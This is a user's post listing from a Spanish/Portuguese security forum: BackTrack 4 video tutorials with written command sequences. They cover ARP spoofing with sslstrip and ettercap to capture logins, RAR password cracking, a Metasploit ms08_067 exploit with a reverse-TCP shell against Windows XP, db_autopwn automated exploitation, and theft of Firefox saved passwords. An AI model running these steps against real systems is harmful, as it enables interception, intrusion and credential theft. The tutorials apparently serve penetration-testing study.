Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Bhior

#1
Ola pessoal, sou Brasileiro mas vou posta essa dica.

1: Instalamos los paquetes necesarios

presionamos alt+f2 y escribimos "konsole" sin las comillas y nos aparecera la terminal donde usaremos los siguientes comando para instalar los paquetes:

Citar# apt-get install language-pack-es


Citar# apt-get install language-pack-es-base

Citar
# apt-get install language-pack-kde-es


Citar# apt-get install language-pack-kde-es-base


Citar# apt-get install language-support-es


Citar# apt-get install language-support-translations-es


Citar# apt-get install language-support-writing-es

Si tienes KDE 3.5.x instalar este paquete:

Citar# apt-get install kde-i18n-es

Si tienes KDE 4.x.x instalar este paquete:

Citar# apt-get install kde-l10n-es

Para saber que version de KDE presionando las teclas "alf+f1" y vamos al menu de backtrack "Settings/Panel Center"
Nota: el "#" significa que lo tienes que hacer como root o con "sudo".

Abraços []'
#2
Instalando o nessus no Back Track 4.

Baixar:
Citarhttp://www.4shared.com/file/M6AEL2PM/Instalando_o_nessus_no_backtra.html

Assista on-line:
Citarhttp://blip.tv/file/3540613

Abraços []'
#4
Nesta video vou mostrar como criptografia SSL não e segura. Foi feita um Homem-no-meio (Man In The Middle), redirecionei todo trafego da rede (porta 80), para uma outra porta onde meu micro escutava. O sniffer de SSL (sslstrip), fica escutando na porta e remove o SSL para que não possa voltar para o usuário. O ettercap que executei em "modo texto" só captura o Usuário(username ) e Senha(password).

Programas usados:

Comando usados:
Citarkate /etc/etter.conf
* Descemente a opção do iptables, tirando o "#"
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ettercap -T -q -i eth0

sslstrip -a -k -f
ettercap -T -q -i eth0


OBS: Se sua internet for wireless no lugar de "eth0" coloca-se "wlan0"

Todas os programas são encontrados no backtrack 4

Baixar:
Citarhttp://www.4shared.com/file/9Np1dj7m/Sniffer_SSL.html
Assista on-line:
Citarhttp://blip.tv/file/3525086

Abraços []'
#5
vídeo aula mostra como quebrar senha de arquivos .rar. Vídeo simples, mostro apenas o uso básico do cRARk, Esse software utilizar recurso CUDA.

Programa usado:

cRARk

Programa pode ser usando para os SO Windows, Linux e Mac.

Manual

Instalação no BackTrack 4:
Citar#apt-get install crark

Download:
Citarhttp://www.4shared.com/file/KScFAiKc/Quebrando_senha_rar.html

Assista on-line:
Citarhttp://blip.tv/file/3529679


Abraços []'
#6
Nessa video aula mostro como usar o metasploit para explorar falha de segurança no sistema operacional Windows XP profissional sp2, que permite execução remota.

Programas usados:
Metasploit framework 3
Nmap

Exploit usado:
Citarms08_067_netapi
Payload(carga)  usado:
Citarshell_reverse_tcp

Tudo encontrado no BackTrack 4.

Solução da falha: Clique aqui

Comandos:
Citar
nmap -sS -O Ip_do_alvo
cd /pentest/exploits/framework3
./msfconsole
show exploits
use windown/smb/ms08_067_netapi
show options
set rhots IP_do_alvo
set rport Porta
set payload /windows/shell/reverse_tcp
set lhost Meu_IP
set id "0" (0 e para encontrar o windows automaticamente, caso não encontre, digitar "info" vai ter o id de vários windows)
exploit


Download:
Citarhttp://www.4shared.com/file/692nIMUK/Metasploit-ms08_067_netapi.htm

Assista on-line:

Citarhttp://blip.tv/file/3534979

Abraços[]
#7
Na vídeo mostro em dois sistema operacionais, Windows e Linux.

Comando linux:
CitarVocê pode usar um editor de texto ou no shell:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

Comandos windows:
CitarIniciar > Painel de controle > Central de segurança > Firewall do Windows > Avançado > Configurações > ICMP


Download:
Citarhttp://www.4shared.com/file/bSWtpcWF/desabilitar_icmp.html

Assista On-line:
Citarhttp://blip.tv/file/3534889
#8
Olá senhores, fiz uma video aula de penetração em um maquina usando windows XP sp2 via metasploit, para o pessoal do fórum que vem acompanhando vídeo anteriores minhas, perceberam que fiz tudo em modo texto, creio que a maioria dos usuários tem uma certa dificuldade ainda em lida com esse modo. Pensando nisso resolvi mostra em modo gráfico.

Na vídeo aula não mostrei como detectar o SO rodando no determinado host, isso pode ser feito com o nmap "nmap -O IP_alvo", para quem vem acompanhando minha vídeo ja poderão perceber isso.

Obs: Na hora de selecionar o Target (versão de sistema operacional), deixei automático, caso ele não encontre, e preciso add o sistema.

Uma coisa boa do modo gráfico e que ele nos fornece tudo organizado (Como vocês vão perceber no decore da vídeo aula), as veces e uma mão na roda... hahaha

Não vou explicar todo o processo da vídeo, caso tenha duvida assistas as anteriores.

Download:
Citarhttp://www.4shared.com/file/M-B3UjNx/Metasploit_GUI_-_Explorando_fa.html

Assista on-line:
Citarhttp://blip.tv/file/3546765


Lembrando que as vídeo aulas são de carácter educacional!!! Apenas estudos.
#9
Bom pessoal, nessa vídeo aula mostro como cria um base de dados para um ataque automatizado usando usando resultados do nmap.

A primeira coisa que eu fiz foi verificar quantos hosts estavam em minha disponível em minha rede com o comando:
Citarnmap 10.1.1.1-100
Ele me mostra o resultado de de todas as maquinas que estão com ip 10.1.1.1, 10.1.1.2, 10.1.1.3 e assim sucessivamente ate o 10.1.1.100.

Nos mostrou 3 hosts:
1- Meu roteador D-link com 3 portas abertas
2- Minha maquina, com todas as portas fechadas :p
3- Maquina virtual usando windows XP (caso tenho duvida qual o sistema operacional rodando em um determinado IP "nmap -O IP")

Segundo passo, foi cria um banco de dados para armazenar os resultados do nmap.
Citardb_create VITIMA (base de dados)

Terceira coisa foi verifica se tinha algum host disponível. Como vocês podem ver não tinha nenhum host predefinido.
Citardb_hosts

Quarta coisa foi escanear o host. Acabei encontrando a porta 445 aberta (Que pode ser vulnerável)
Citarnmap IP -p 445

Para finalizar eu executei o ataque automatizado. Então ele começou a procurar um exploit e foi injetando no host, para encontrar o exploit indicado para a vulnerabilidade da porta 445.
Citardb_autopwn -t -p -e -s -b
No final ele me mostrou o exploit usado e ja injetado no host, já estaba dentro do sistema com um meterpreter.

Programas usando:

metasploit & nmap

Download da video:
Citarhttp://www.4shared.com/file/LTh9Nx51/MetasploitNmap.html

Assista On-line:
Citarhttp://blip.tv/file/3541556
#10
Ola senhores, nesta aula demonstro uma invasão a um SO Windows XP com metasploit via meterpreter, visando arquivos da base do mozilla firefox onde ficam armazenados as senhas memorizadas pelo navegador.

Detalhei bem a aula, caso haja duvida reporte abaixo.

Baixar:
Citarhttp://www.4shared.com/file/QmR0fbEn/Hack_firefox-meterpreter.html
Programa:
CitarFirePasswordViewer.rar
Assista On-line:
Citarhttp://blip.tv/file/3597402